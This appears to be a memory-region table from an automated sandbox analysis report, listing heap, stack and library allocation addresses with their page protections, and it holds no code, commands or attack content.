|
||
|
22C199CF000
|
heap
|
page read and write
|
||
|
22C01460000
|
heap
|
page readonly
|
||
|
7FFD34443000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343A0000
|
trusted library allocation
|
page read and write
|
||
|
17BD804C000
|
heap
|
page read and write
|
||
|
C76000
|
heap
|
page read and write
|
||
|
D07CBFE000
|
stack
|
page read and write
|
||
|
7FFD34292000
|
trusted library allocation
|
page read and write
|
||
|
58FC8FE000
|
stack
|
page read and write
|
||
|
22C02D5F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34290000
|
trusted library allocation
|
page read and write
|
||
|
1A552140000
|
heap
|
page read and write
|
||
|
1A552090000
|
heap
|
page read and write
|
||
|
22C01BCD000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34390000
|
trusted library allocation
|
page read and write
|
||
|
1A553B10000
|
heap
|
page read and write
|
||
|
22C7EF57000
|
heap
|
page read and write
|
||
|
7FFD342E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
58FCA7E000
|
stack
|
page read and write
|
||
|
17BD8401000
|
heap
|
page read and write
|
||
|
17BD83A6000
|
heap
|
page read and write
|
||
|
7FFD341A6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3418C000
|
trusted library allocation
|
page execute and read and write
|
||
|
22C12CB4000
|
trusted library allocation
|
page read and write
|
||
|
17BD8100000
|
heap
|
page read and write
|
||
|
7FFD34360000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342AA000
|
trusted library allocation
|
page read and write
|
||
|
17BD8400000
|
heap
|
page read and write
|
||
|
7FFD34410000
|
trusted library allocation
|
page read and write
|
||
|
22C7EF1A000
|
heap
|
page read and write
|
||
|
17BD628F000
|
heap
|
page read and write
|
||
|
7FFD34100000
|
trusted library allocation
|
page read and write
|
||
|
58FC9FF000
|
stack
|
page read and write
|
||
|
17BD8115000
|
heap
|
page read and write
|
||
|
17BD83D1000
|
heap
|
page read and write
|
||
|
4EF01FF000
|
stack
|
page read and write
|
||
|
1A554311000
|
trusted library allocation
|
page read and write
|
||
|
22C1299E000
|
trusted library allocation
|
page read and write
|
||
|
4EEFAFE000
|
stack
|
page read and write
|
||
|
22C02F82000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34390000
|
trusted library allocation
|
page read and write
|
||
|
4EF00FE000
|
stack
|
page read and write
|
||
|
22C7EEDA000
|
heap
|
page read and write
|
||
|
22C02D3E000
|
trusted library allocation
|
page read and write
|
||
|
17BD8398000
|
heap
|
page read and write
|
||
|
17BD838F000
|
heap
|
page read and write
|
||
|
1A554586000
|
trusted library allocation
|
page read and write
|
||
|
17BD8300000
|
heap
|
page read and write
|
||
|
7FFD3445C000
|
trusted library allocation
|
page read and write
|
||
|
22C016DB000
|
trusted library allocation
|
page read and write
|
||
|
22C02D39000
|
trusted library allocation
|
page read and write
|
||
|
22C01882000
|
trusted library allocation
|
page read and write
|
||
|
22C7F090000
|
heap
|
page read and write
|
||
|
17BD83D1000
|
heap
|
page read and write
|
||
|
17BD8053000
|
heap
|
page read and write
|
||
|
22C01A60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD341F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BD6250000
|
heap
|
page read and write
|
||
|
C40000
|
heap
|
page read and write
|
||
|
7FFD34180000
|
trusted library allocation
|
page read and write
|
||
|
D07D0BF000
|
stack
|
page read and write
|
||
|
22C01450000
|
trusted library allocation
|
page read and write
|
||
|
17BD8118000
|
heap
|
page read and write
|
||
|
1A552190000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
7FFD34186000
|
trusted library allocation
|
page read and write
|
||
|
17BD8068000
|
heap
|
page read and write
|
||
|
17BD800B000
|
heap
|
page read and write
|
||
|
7FFD341D6000
|
trusted library allocation
|
page execute and read and write
|
||
|
58FC483000
|
stack
|
page read and write
|
||
|
17BD8111000
|
heap
|
page read and write
|
||
|
22C19A16000
|
heap
|
page read and write
|
||
|
22C014A0000
|
trusted library allocation
|
page read and write
|
||
|
1A554246000
|
trusted library allocation
|
page read and write
|
||
|
22C03008000
|
trusted library allocation
|
page read and write
|
||
|
22C11C7B000
|
trusted library allocation
|
page read and write
|
||
|
17BD8278000
|
heap
|
page read and write
|
||
|
17BD827C000
|
heap
|
page read and write
|
||
|
D07CD7E000
|
stack
|
page read and write
|
||
|
17BD8278000
|
heap
|
page read and write
|
||
|
22C01470000
|
trusted library allocation
|
page read and write
|
||
|
1A554000000
|
heap
|
page read and write
|
||
|
1A5546CB000
|
trusted library allocation
|
page read and write
|
||
|
17BD8037000
|
heap
|
page read and write
|
||
|
17BD8141000
|
heap
|
page read and write
|
||
|
1A554223000
|
trusted library allocation
|
page read and write
|
||
|
17BD814C000
|
heap
|
page read and write
|
||
|
17BD83B0000
|
heap
|
page read and write
|
||
|
22C19806000
|
heap
|
page read and write
|
||
|
58FC5CE000
|
stack
|
page read and write
|
||
|
17BD8105000
|
heap
|
page read and write
|
||
|
22C7F186000
|
heap
|
page read and write
|
||
|
22C0334E000
|
trusted library allocation
|
page read and write
|
||
|
22C014D0000
|
trusted library allocation
|
page read and write
|
||
|
17BD8131000
|
heap
|
page read and write
|
||
|
22C7EEEE000
|
heap
|
page read and write
|
||
|
1A554314000
|
trusted library allocation
|
page read and write
|
||
|
D07CB7E000
|
stack
|
page read and write
|
||
|
22C7EE90000
|
heap
|
page read and write
|
||
|
22C7EE60000
|
heap
|
page read and write
|
||
|
17BD838F000
|
heap
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
22C12BC2000
|
trusted library allocation
|
page read and write
|
||
|
1A554055000
|
heap
|
page read and write
|
||
|
D07DC8E000
|
stack
|
page read and write
|
||
|
7FFD34400000
|
trusted library allocation
|
page read and write
|
There are 444 hidden memdumps, click here to show them.